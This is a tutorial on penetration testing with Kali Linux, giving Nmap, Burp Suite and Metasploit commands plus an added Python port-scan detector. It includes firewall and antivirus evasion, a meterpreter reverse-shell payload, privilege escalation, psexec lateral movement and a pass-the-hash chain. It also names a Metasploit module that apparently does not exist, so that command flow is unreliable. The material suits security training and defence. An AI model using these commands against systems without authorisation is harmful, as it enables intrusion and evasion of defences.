Used by 78% of penetration testers, Kali Linux provides 600+ security tools. This tutorial covers Nmap, Burp Suite, and Metasploit with professional configurations, real-world attack scenarios, and defensive bypass techniques.
Kali Linux: Professional Penetration Testing Tools Guide
[Figure: Kali Tool Usage in Penetration Tests (2023)]
1. Nmap Network Scanning
Essential Scans:
- Discovery: `nmap -sn 192.168.1.0/24`
- Port Scan: `nmap -sS -p- -T4 10.10.10.10`
- Service Detection: `nmap -sV -sC -O 10.10.10.10`
Advanced Techniques:
```bash
# Evade firewall with fragmentation
nmap -f -D RND:10 --data-length 24 10.10.10.10
# UDP service scanning
nmap -sU -p 53,67,123,161 10.10.10.10
# NSE script usage
nmap --script vuln,exploit 10.10.10.10
```
Enterprise Tip: Use `masscan` for large networks (1M+ hosts), then verify the results with Nmap.
2. Burp Suite Web Testing
Core Modules:
- Proxy: Intercept and modify requests
- Scanner: Automated vulnerability detection
- Intruder: Custom parameter fuzzing
- Repeater: Manual request manipulation
Professional Configurations:
- Install CA certificate for HTTPS interception
- Configure scope to avoid attacking non-target domains
- Use Collaborator for out-of-band testing
Case Study: Finding blind XSS via Burp Collaborator callback detection.
3. Metasploit Framework
Exploitation Process:
- Search for exploits: `search exploit eternalblue`
- Configure payload: `set payload windows/x64/meterpreter/reverse_tcp`
- Execute: `exploit -j`
Post-Exploitation:
```bash
# Privilege escalation
getsystem
run post/multi/recon/local_exploit_suggester
# Lateral movement
use exploit/windows/smb/psexec
set RHOSTS 192.168.1.5-20
```
Defensive Bypass: Use `msfvenom -e x86/shikata_ga_nai -i 5` for AV evasion.
4. Integrated Attack Scenario
Enterprise Penetration Test:
- Recon: Nmap scan discovers port 443
- Enumeration: Burp finds SQLi in web app
- Exploitation: Metasploit gains shell access
- Post-Exploit: Hashdump → Pass-the-Hash attack
Command Flow:
```bash
nmap -sV -p 443 --script=http-sql-injection 10.10.10.10
sqlmap -u "https://10.10.10.10/login" --data="user=admin" --dbs
msfconsole -x "use exploit/multi/http/sql_injection; set RHOSTS 10.10.10.10; exploit"
```
Kali Tools Cheat Sheet
| Tool | Command | Purpose | Enterprise Use |
|---|---|---|---|
| Nmap | `-sS -sV -O` | Stealthy scanning | Network audits |
| Burp | Intruder | Parameter fuzzing | Web app testing |
| Metasploit | `exploit -j` | Background exploits | Red teaming |
5. Defensive Countermeasures
Against Nmap
- Network segmentation
- IDS signature tuning
- Port randomization
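As an added example (not part of the original guide), here is a small Python heuristic for the "IDS signature tuning" item: it flags a source that sends bare SYNs to many distinct ports of one host inside a short window, which is the footprint of the `nmap -sS -p- -T4` scan from Section 1. The firewall log format and the sample lines are constructed for this example, not output of any real product.

```python
"""Flag a source that sends bare SYNs to many distinct ports of one host in a
short window, the footprint of `nmap -sS -p- -T4`. Log format and sample lines
are constructed for this example (hypothetical firewall syslog)."""
import re
from collections import defaultdict
from datetime import datetime
# Constructed format: "<ISO ts> <ACTION> src=<ip> dst=<ip> proto=TCP spt=<n> dpt=<n> flags=<f>"
LINE_RE = re.compile(
    r"^(?P<ts>\S+) \w+ src=(?P<src>[\d.]+) dst=(?P<dst>[\d.]+) "
    r"proto=TCP spt=\d+ dpt=(?P<dpt>\d+) flags=(?P<flags>\S+)$"
)

def parse(line):
    """Return (timestamp, src, dst, dport, flags), or None for unrelated lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.fromisoformat(m["ts"].replace("Z", "+00:00"))
    return ts, m["src"], m["dst"], int(m["dpt"]), m["flags"]

def detect_port_scans(lines, threshold=10, window_seconds=10):
    """Return {src: ports} for sources that hit >= threshold distinct ports of one
    destination within any window_seconds span; only bare SYNs (flags == "S") count."""
    events = defaultdict(list)  # (src, dst) -> [(ts, dport), ...]
    for line in lines:
        parsed = parse(line)
        if parsed and parsed[4] == "S":
            ts, src, dst, dport, _ = parsed
            events[(src, dst)].append((ts, dport))
    hits = {}
    for (src, _dst), evs in events.items():
        evs.sort()
        start = 0
        for end in range(len(evs)):  # sliding window over time-ordered SYNs
            while (evs[end][0] - evs[start][0]).total_seconds() > window_seconds:
                start += 1
            ports = {p for _, p in evs[start:end + 1]}
            if len(ports) >= threshold:  # threshold/window are the IDS tuning knobs
                hits.setdefault(src, set()).update(ports)
    return hits

# Constructed sample: a fast sweep (12 ports in 12 s), a slow sweep (one port
# every 30 s, so never 10 ports inside the default window) and a normal client.
SAMPLE_LOG = (
    [f"2023-06-01T10:00:{i:02d}Z DROP src=10.10.10.50 dst=10.10.10.10 proto=TCP "
     f"spt={50000 + i} dpt={20 + i} flags=S" for i in range(12)]
    + [f"2023-06-01T10:{i // 2:02d}:{i % 2 * 30:02d}Z DROP src=10.10.10.60 dst=10.10.10.10 "
       f"proto=TCP spt={51000 + i} dpt={20 + i} flags=S" for i in range(12)]
    + ["2023-06-01T10:00:03Z ACCEPT src=10.10.10.77 dst=10.10.10.10 proto=TCP spt=52000 dpt=443 flags=S"]
)
```

Widening `window_seconds` catches the slow sweep at the cost of more false positives from busy clients, which is exactly the trade-off signature tuning has to make per network.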
Against Burp
- WAF implementation
- Rate limiting
- CSRF tokens
Against Metasploit
- Endpoint detection (EDR)
- Patch management
- Network segmentation
Kali Linux Proficiency Plan
✓ Master 10 Nmap scanning techniques
✓ Complete Burp Academy modules
✓ Exploit 5 HTB machines with Metasploit
✓ Document findings in Dradis
Senior Pentester Insight: The 2023 Offensive Security Report shows testers combining Nmap, Burp and Metasploit find 3x more vulnerabilities. Kali Linux remains the industry standard because its tools mirror real attacker methodologies.